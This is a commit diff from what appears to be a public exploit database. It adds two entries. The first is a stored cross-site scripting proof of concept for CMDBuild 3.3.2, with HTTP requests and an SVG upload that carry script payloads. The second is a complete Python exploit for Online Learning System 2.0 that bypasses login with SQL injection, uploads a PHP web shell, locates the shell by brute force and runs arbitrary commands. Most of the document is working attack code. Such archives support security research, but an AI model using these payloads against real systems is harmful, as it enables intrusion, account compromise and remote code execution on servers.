DB: 2021-11-17

2 changes to exploits/shellcodes Online Learning System 2.0 - Remote Code Execution (RCE) CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
2021-11-17 05:02:13 +00:00 · 2021-11-17 05:02:13 +00:00 · 11900b8459
commit 11900b8459
parent 412b034ee9
3 changed files with 193 additions and 0 deletions
--- a/exploits/multiple/webapps/50527.txt
+++ b/exploits/multiple/webapps/50527.txt
@ -0,0 +1,81 @@
+# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 15/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://www.cmdbuild.org
+# Software Link: https://www.cmdbuild.org/en/download/latest-version
+# Version: CMDBuild 3.3.2
+# Tested on: Linux
+
+Summary:
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
+
+Proof of concepts :
+
+Stored Xss Example:
+
+1-Login to you'r Dashboard As a low privilege user
+2-Click On Basic archives and Employee
+3- +Add card Employee
+4- Enter your xss payload in parameters
+5-On added employee click on "Open Relation Graph"
+
+POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
+...
+Cmdbuild-Actionid: class.card.new.open
+Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
+
+Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
+X-Requested-With: XMLHttpRequest
+Content-Length: 302
+Connection: close
+
+{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
+
+
+------------------------------------------------------------------------
+
+
+File upload Xss example:
+
+1-Click on Basic archives
+2-Click on Workplace - + Add card Workplace
+3-Select "attachments" icon - +Add attachment + image
+4-Upload your svg file with xss payload
+5-Click on preview and Right click open in new tab
+
+
+
+Request:
+POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
+Cmdbuild-Actionid: class.card.attachments.open
+
+-----------------------------269319782833689825543405205260
+Content-Disposition: form-data; name="file"; filename="kiwi.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
+	 width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
+	 xml:space="preserve">
+<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
+<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
+	c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
+	c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
+	c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
+	c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
+	c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
+	c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
+	c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
+	c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
+	c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
+	c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
+	c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
+	c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
+	c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
+	z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
+	C434.693,207.929,439.613,203.01,445.731,203.01z"/>
+	<script>alert(1)</script>
+</svg>
--- a/exploits/php/webapps/50526.py
+++ b/exploits/php/webapps/50526.py
@ -0,0 +1,110 @@
+# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
+# Date: 15/11/2021
+# Exploit Author: djebbaranon
+# Vendor Homepage: https://github.com/oretnom23
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
+# Version: 2.0
+# Tested on: Kali linux / Windows 10
+# CVE : CVE-2021-42580
+
+#!/usr/bin/python3
+import os
+import time
+import argparse
+import requests
+import sys
+from colorama import init
+from colorama import Fore
+from colorama import Back
+from colorama import Style
+init(autoreset=True)
+def banner():
+	print('''
+
+ _____       _ _              _                       _                     _____  ______ _____ _____
+|  _  |     | (_)            | |                     (_)                   / __  \ | ___ /  __ |  ___|
+| | | |_ __ | |_ _ __   ___  | | ___  __ _ _ __ _ __  _ _ __   __ _  __   _`' / /' | |_/ | /  \| |__
+| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / /   |    /| |   |  __|
+\ \_/ | | | | | | | | |  __/ | |  __| (_| | |  | | | | | | | | (_| |  \ V /./ /___ | |\ \| \__/| |___
+ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_|  |_| |_|_|_| |_|\__, |   \_/ \_____/ \_| \_|\____\____/
+                                                               __/ |
+                                                              |___/
+		Written by djebbaranon
+		twitter :  @dj3bb4ran0n1
+		zone-h : http://zone-h.org/archive/notifier=djebbaranon
+''')
+banner()
+def my_args():
+	parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
+	parser.add_argument("-u","--url",type=str,required=True,help="url of target")
+	parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
+	parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
+	my_arguments = parser.parse_args()
+	return my_arguments
+def login_with_sqli_login_bypass(user,passw):
+	global session
+	global url
+	global cookies
+	url = my_args().url
+	session = requests.Session()
+	data = {
+	"username" : user,
+	"password" : passw,
+	}
+	try:
+		response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
+		print( Fore.GREEN + "[+] Logged in succsusfully")
+		cookies = response.cookies.get_dict()
+		print("[+] your cookie : ")
+	except requests.HTTPError as exception:
+		print(Fore.RED + "[-] HTTP Error : {}".format(exception))
+		sys.exit(1)
+login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
+def main(shell_name,renamed_shell):
+	try:
+		payload ={
+			"id" : "",
+			"faculty_id" : "test",
+			"firstname" : "test",
+			"lastname" : "test",
+			"middlename" : "fsdfsd",
+			"dob" : "2021-10-29",
+			"gender": "Male",
+			"department_id" : "1",
+			"email" : "zebi@gmail.com",
+			"contact" : "zebii",
+			"address" :  "zebii",
+		}
+		files = {
+			"img" :
+				(
+					shell_name,
+					"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
+					"application/octet-stream",
+					)
+		}
+		vunlerable_file = "/classes/Master.php?f=save_faculty"
+		print("[*] Trying to upload webshell ....")
+		response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
+		print("[+] trying to bruteforce the webshell ....")
+		rangee = my_args().range
+		for i in range(0,rangee):
+			try:
+				with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
+					if "nikmok" in response3.text and response3.status_code == 200:
+						print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
+						break
+						with open("shell.txt",mode="w+") as writer:
+							writer.write(response3.url)
+					else:
+						print( Fore.RED + "[-] shell not found : " + response3.url)
+			except requests.HTTPError as exception2:
+				print("[-] HTTP Error : {0} ".format(exception2))
+	except requests.HTTPError as error:
+		print("[-] HTTP Error : ".format(error))
+	command = my_args().command
+	with requests.get(response3.url.replace("whoami",command)) as response4:
+		print("[*] Executing {} ....".format(command))
+		time.sleep(3)
+		print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
+main("hackerman.php","")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44622,3 +44622,5 @@ id,file,description,date,author,type,platform,port
 50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
 50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
 50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
+50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
+50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,